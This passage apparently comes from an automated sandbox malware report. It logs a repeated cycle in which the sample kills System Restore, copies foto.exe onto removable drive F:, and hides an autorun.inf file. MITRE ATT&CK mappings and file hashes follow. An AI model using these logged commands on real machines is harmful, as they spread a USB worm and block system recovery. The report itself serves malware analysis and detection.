    - Sets file to hidden
    PID:1600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:3372
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:392
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:4040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3508
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1620
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1420
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:4768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4296
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:5116
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4756
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:5088
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:5096
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:4332
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4836
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:4500
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2408
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4636
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1012
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:436
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:3000
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3244
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:5092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5060
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2356
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2720
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1188
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3728
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:232
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:360
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:4828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:5100
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3536
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:904
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:224
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3148
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3904
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:4368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:388
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:4652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4588
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:460
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\windows_update.bat

Filesize
1KB

MD5
bc4a82e294f1ef73ebf54d8cbff10e1f

SHA1
c8a0d9522ef20d16e9f4f23bad004b2ee49f600e

SHA256
5556c225c15254fb8209479757dfd680a3b8f9dd97554777e8a63ad8718fee6d

SHA512
1d0857fea9ca525196a3f9ba46eefa88d75b9f036ba5322e08426d595e3ee18511656cd37d885c9bca95288aacd8d1d8391d47c2b34c1e9e66d7d201ec6da897

Download Submit
F:\autorun.inf

Filesize
119B

MD5
cd5420c9932b95d7511ecbddf14ae6c7

SHA1
01fc0690cea6eda07b36f07360a9bbd010ece61d

SHA256
a80abb5d332141c06617529eac78fe3da275d986c7a968b3bb5d045f4ca9e03c

SHA512
c7f0545816f67a191b16b03e7fda5a0952a4366ae5284796625c0e133f07c92cae69dcee1fe2a0ce06a529899db74e70674f3a236e4d675d0a048e069a4bc210

Download Submit
memory/4912-0-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4912-11-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download